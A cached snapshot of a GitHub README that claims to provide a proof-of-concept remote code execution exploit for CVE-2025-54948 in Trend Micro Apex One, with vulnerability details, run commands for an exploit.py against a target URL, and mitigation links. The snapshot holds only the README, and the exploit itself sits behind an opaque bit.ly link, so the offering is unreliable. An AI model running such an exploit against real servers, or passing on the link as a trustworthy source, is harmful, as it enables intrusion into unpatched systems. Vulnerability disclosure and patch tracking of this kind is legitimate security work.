Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-54948 PoC — Trend Micro Apex One 安全漏洞

Source
https://github.com/allinsthon/CVE-2025-54948
Associated Vulnerability
Title:Trend Micro Apex One 安全漏洞 (CVE-2025-54948)
Description:Trend Micro Apex One是美国趋势科技(Trend Micro)公司的一款终端防护软件。 Trend Micro Apex One存在安全漏洞,该漏洞源于允许预认证远程攻击者上传恶意代码并执行命令。
Readme
# CVE-2025-54948 PoC Exploit - Trend Micro Apex One Management Console RCE

This repository provides a proof-of-concept (PoC) exploit for CVE-2025-54948, a remote code execution vulnerability in the Trend Micro Apex One Management Console (on-premise). The vulnerability allows pre-authenticated attackers to execute arbitrary commands due to insufficient input validation.

**WARNING**: This PoC is for educational and authorized testing purposes only. Unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical. The author is not responsible for any misuse.

## Vulnerability Details

- **CVE ID**: CVE-2025-54948
- **CVSSv3 Score**: 9.4 (Critical)
- **Affected Software**: Trend Micro Apex One (on-premise), Management Server ≤ 14039
- **Platform**: Windows
- **Description**: A command injection vulnerability in the management console allows pre-authenticated attackers to upload and execute malicious code.

## Exploit - [href](http://bit.ly/3HpN6dp)

## Usage

1. **Install Dependencies**:
   ```bash
   pip install -r requirements.txt
   ```

2. **Run the Exploit**:
   ```bash
   python exploit.py <target_url> [--command <command>]
   ```
   Example:
   ```bash
   python exploit.py "http://192.168.1.100:8080" --command "whoami"
   ```

3. **Verify Output**: Check the console logs for execution status and response details.

## Requirements

- Python 3.6+
- Libraries listed in `requirements.txt`

## Disclaimer

This PoC is provided "as is" for security researchers and system administrators to understand the vulnerability. Use it only with explicit permission from the system owner. Misuse may violate laws and cause harm.

## Mitigation

A full patch is expected by mid-August 2025. See [Trend Micro Security Bulletin](https://success.trendmicro.com/en-US/solution/KA-0019926).

## References

- [Trend Micro Security Bulletin](https://success.trendmicro.com/en-US/solution/KA-0019926)
- [Qualys ThreatPROTECT Blog](https://threatprotect.qualys.com/2025/08/06/trend-micro-apex-one-on-prem-zero-day-vulnerabilities-exploited-in-the-wild-cve-2025-54948-cve-2025-54987/)
File Snapshot

 [4.0K]  /data/pocs/6df3d7e0004136919c03ed1efd812906008de3ac
└── [2.1K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.